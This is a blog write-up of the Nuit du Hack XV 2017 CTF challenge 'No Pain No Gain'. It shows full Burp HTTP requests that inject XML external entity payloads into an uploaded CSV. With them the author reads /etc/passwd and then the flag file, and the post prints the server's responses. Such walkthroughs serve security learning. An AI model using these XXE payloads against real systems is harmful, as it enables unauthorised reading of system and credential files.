Nuit du Hack XV – 2017 – No Pain No Gain

Here is how to resolve the challenge “No Pain No Gain” provided, during a CTF, by Nuit du Hack XV between the 31st of March 2017 to the 1st of April 2017:

Nuit du Hack XV - No Pain No Gain
Nuit du Hack XV – No Pain No Gain

As you can see, you need to upload a CSV file formatted as provided by the Web Application (see the picture above).

First of all, you need to create your CSV file and after that, upload it and check the result that you get from the Web Application.

A table should appear with all the information provided inside the CSV file. If you put something not expected, you should see an error that the Web Application cannot convert your CSV to XML! (It was a good tip)

I tried to inject codes inside the fields (id, name, email) with Burp as below:

POST /index.php HTTP/1.1

Host: nopainnogain.quals.nuitduhack.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://nopainnogain.quals.nuitduhack.com/index.php

Connection: close

Content-Type: multipart/form-data; boundary=—————————13765813638035171811862571275

Content-Length: 433

—————————–13765813638035171811862571275

Content-Disposition: form-data; name="file"; filename="upload.csv"

Content-Type: text/csv

<!– Invitations –>

id,name,email

a,& lt;,z

—————————–13765813638035171811862571275

Content-Disposition: form-data; name="submit"

Submit Query

—————————–13765813638035171811862571275–

I used an HTML code “& lt;” (it means “<” – you should remove the space between “&” and “lt;“).

After that, I got a nice picture of Mario as shown below:

Nuit du Hack XV - No Pain No Gain - Mario
Nuit du Hack XV – No Pain No Gain – Mario

Web Application response:

  <script>alert('Thank You Mario! But Our Princess is in Another Castle!')</script>

  <center>

    <img src='thankyou.png' height='450' width='500'>

  </center>

I downloaded the image and I tried to analyse it with steganography, but nothing there… I thought to continue to investigate the code injection inside the fields (id, name, email) with others HTML codes but nothing there also…

After that, I analyzed the first line of the CSV and I modified “Invitations” with something else and it worked without errors… I tried to perform an XML injection:

POST /index.php HTTP/1.1

Host: nopainnogain.quals.nuitduhack.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://nopainnogain.quals.nuitduhack.com/index.php

Connection: close

Content-Type: multipart/form-data; boundary=—————————13765813638035171811862571275

Content-Length: 434

—————————–13765813638035171811862571275

Content-Disposition: form-data; name="file"; filename="upload.csv"

Content-Type: text/csv

<!DOCTYPE warren [ <!ENTITY var SYSTEM "test" > ]>

id,name,email

a,&var;,z

—————————–13765813638035171811862571275

Content-Disposition: form-data; name="submit"

Submit Query

—————————–13765813638035171811862571275–

I got directly the value “test” where “&var;” was located. This means that, we have a possible XML injection!

Next request was to get the “/etc/passwd” file:

Request:

POST /index.php HTTP/1.1

Host: nopainnogain.quals.nuitduhack.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://nopainnogain.quals.nuitduhack.com/index.php

Connection: close

Content-Type: multipart/form-data; boundary=—————————13765813638035171811862571275

Content-Length: 434

—————————–13765813638035171811862571275

Content-Disposition: form-data; name="file"; filename="upload.csv"

Content-Type: text/csv

<!DOCTYPE warren [ <!ENTITY var SYSTEM "file:///etc/passwd" > ]>

id,name,email

a,&var;,z

—————————–13765813638035171811862571275

Content-Disposition: form-data; name="submit"

Submit Query

—————————–13765813638035171811862571275–

Web Application response:


...
<table style='width:100%'>
<tr>
<th>ID</th>
<th>Name</th>
<th>Email</th>
</tr>
<tr>
<td>a</td>
<td>
root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false

systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false

systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false

systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

flag:x:1000:1000::/home/flag:/bin/sh</td>
<td>z</td>
</tr>
</table>

As you can see, there is a “flag” user linked to the “/home/flag” directory. I tried to get the flag like this “/home/flag/flag” and it worked:

Request:

POST /index.php HTTP/1.1

Host: nopainnogain.quals.nuitduhack.com

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Referer: http://nopainnogain.quals.nuitduhack.com/index.php

Connection: close

Content-Type: multipart/form-data; boundary=—————————13765813638035171811862571275

Content-Length: 438

—————————–13765813638035171811862571275

Content-Disposition: form-data; name="file"; filename="upload.csv"

Content-Type: text/csv

<!DOCTYPE warren [ <!ENTITY var SYSTEM "file:///home/flag/flag" > ]>

id,name,email

a,&var;,z

—————————–13765813638035171811862571275

Content-Disposition: form-data; name="submit"

Submit Query

—————————–13765813638035171811862571275–

Web Application response:

<table style='width:100%'>
<tr>
<th>ID</th>
<th>Name</th>
<th>Email</th>
</tr>
<tr>
<td>a</td>
<td>NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}</td>
<td>z</td>
</tr>
</table>

I got the flag!

NDH{U3VwZXIgTWFyaW8gQnJvcw0K44K544O844OR44O844Oe44Oq44Kq44OW44Op44K244O844K6DQpTxatwxIEgTWFyaW8gQnVyYXrEgXp1DQrYs9mI2KjYsdmF2KfYsdmK2Yg=}

Do not hesitate to leave me comments! 🙂

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s